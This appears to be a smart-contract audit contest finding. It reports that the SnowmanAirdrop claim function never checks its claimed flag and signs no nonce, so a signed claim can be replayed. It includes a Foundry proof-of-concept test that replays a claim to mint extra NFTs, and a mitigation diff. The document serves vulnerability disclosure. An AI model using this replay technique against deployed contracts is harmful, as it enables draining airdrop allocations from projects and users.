Submission Details
Impact:
Likelihood:
Missing claim guard allows repeated airdrop claims
Root + Impact
Description
Expected behavior: each eligible address claims once for its Merkle snapshot allocation.
Actual behavior:
s_hasClaimedSnowmanis set but never checked, and the signed payload has no nonce or deadline, so claims can be replayed after the receiver restores their Snow balance.
function claimSnowman(address receiver, bytes32[] calldata merkleProof, uint8 v, bytes32 r, bytes32 s)
external
nonReentrant
{
@ // Missing guard: previously claimed addresses are not blocked
if (receiver == address(0)) {
revert SA__ZeroAddress();
}
if (i_snow.balanceOf(receiver) == 0) {
revert SA__ZeroAmount();
}
if (!_isValidSignature(receiver, getMessageHash(receiver), v, r, s)) {
revert SA__InvalidSignature();
}
uint256 amount = i_snow.balanceOf(receiver);
bytes32 leaf = keccak256(bytes.concat(keccak256(abi.encode(receiver, amount))));
if (!MerkleProof.verify(merkleProof, i_merkleRoot, leaf)) {
revert SA__InvalidProof();
}
i_snow.safeTransferFrom(receiver, address(this), amount);
@ s_hasClaimedSnowman[receiver] = true;
emit SnowmanClaimedSuccessfully(receiver, amount);
i_snowman.mintSnowman(receiver, amount);
}
Risk
Likelihood:
Any eligible receiver can replay the same proof and signature after rebuying Snow to the snapshot amount.
No nonce/deadline or claim-status check prevents reuse.
Impact:
Multiple claims inflate NFT supply beyond the Merkle allocation.
Airdrop distribution integrity is broken for every replaying address.
Proof of Concept
Path:
audit/poc/F-002_ReplayClaim.t.sol
// SPDX-License-Identifier: MIT
import {Test} from "forge-std/Test.sol";
import {Snow} from "src/Snow.sol";
import {Snowman} from "src/Snowman.sol";
import {SnowmanAirdrop} from "src/SnowmanAirdrop.sol";
import {Helper} from "script/Helper.s.sol";
contract ReplayClaimTest is Test {
// Protocol contracts.
Snow private snow;
Snowman private snowman;
SnowmanAirdrop private airdrop;
// Test helper to set up balances and airdrop.
Helper private helper;
// Alice proof values (from script/flakes/output.json and TestSnowmanAirdrop).
bytes32 private constant AL_PROOF_A =
0xf99782cec890699d4947528f9884acaca174602bb028a66d0870534acf241c52;
bytes32 private constant AL_PROOF_B =
0xbc5a8a0aad4a65155abf53bb707aa6d66b11b220ecb672f7832c05613dba82af;
bytes32 private constant AL_PROOF_C =
0x971653456742d62534a5d7594745c292dda6a75c69c43a6a6249523f26e0cac1;
bytes32[] private AL_PROOF = [AL_PROOF_A, AL_PROOF_B, AL_PROOF_C];
// Roles.
address private alice;
uint256 private aliceKey;
address private relayer;
function setUp() public {
helper = new Helper(); // deploy helper for setup
(airdrop, snow, snowman,) = helper.run(); // deploy protocol and seed balances
(alice, aliceKey) = makeAddrAndKey("alice"); // set Alice address and key
relayer = makeAddr("relayer"); // set relayer address
}
function _signForAlice() internal returns (uint8 v, bytes32 r, bytes32 s) {
bytes32 digest = airdrop.getMessageHash(alice); // compute EIP-712 digest
(v, r, s) = vm.sign(aliceKey, digest); // sign digest as Alice
}
function _approveSnow() internal {
vm.prank(alice); // impersonate Alice
snow.approve(address(airdrop), 1); // approve airdrop to transfer Snow
}
function test_ReplayClaimAfterRebuyingSnow() public {
_approveSnow(); // approve for first claim
(uint8 v, bytes32 r, bytes32 s) = _signForAlice(); // sign claim once
vm.prank(relayer); // impersonate relayer
airdrop.claimSnowman(alice, AL_PROOF, v, r, s); // submit first claim
assertEq(snowman.balanceOf(alice), 1); // confirm first mint
uint256 fee = snow.s_buyFee(); // read ETH price for 1 Snow
vm.deal(alice, fee); // fund Alice for buy
vm.prank(alice); // impersonate Alice
snow.buySnow{value: fee}(1); // rebuy Snow to snapshot amount
_approveSnow(); // approve for second claim
vm.prank(relayer); // impersonate relayer again
airdrop.claimSnowman(alice, AL_PROOF, v, r, s); // replay claim
assertEq(snowman.balanceOf(alice), 2); // confirm replayed mint
}
function test_ClaimSucceedsEvenWhenClaimStatusTrue() public {
_approveSnow(); // approve for first claim
(uint8 v, bytes32 r, bytes32 s) = _signForAlice(); // sign claim once
vm.prank(relayer); // impersonate relayer
airdrop.claimSnowman(alice, AL_PROOF, v, r, s); // submit first claim
assertTrue(airdrop.getClaimStatus(alice)); // confirm claimed status is true
uint256 fee = snow.s_buyFee(); // read ETH price for 1 Snow
vm.deal(alice, fee); // fund Alice for buy
vm.prank(alice); // impersonate Alice
snow.buySnow{value: fee}(1); // rebuy Snow to snapshot amount
_approveSnow(); // approve for second claim
vm.prank(relayer); // impersonate relayer again
airdrop.claimSnowman(alice, AL_PROOF, v, r, s); // claim again despite status
assertEq(snowman.balanceOf(alice), 2); // confirm second mint succeeded
}
}
Recommended Mitigation
function claimSnowman(address receiver, bytes32[] calldata merkleProof, uint8 v, bytes32 r, bytes32 s)
external
nonReentrant
{
+ if (s_hasClaimedSnowman[receiver]) {
+ revert SA__AlreadyClaimed();
+ }
if (receiver == address(0)) {
revert SA__ZeroAddress();
}
if (i_snow.balanceOf(receiver) == 0) {
revert SA__ZeroAmount();
}
// Optional: include nonce/deadline in the signed payload to prevent replay
...
}
Rewards breakdown
This contest has a flat reward structure with the following payouts:
Live
The contest is live. Earn rewards by submitting a finding.
Judging
Submissions are being reviewed by our AI judge. Results will be available in a few minutes.
View all submissionsRewards Distribution
The contest is complete and the rewards are being distributed.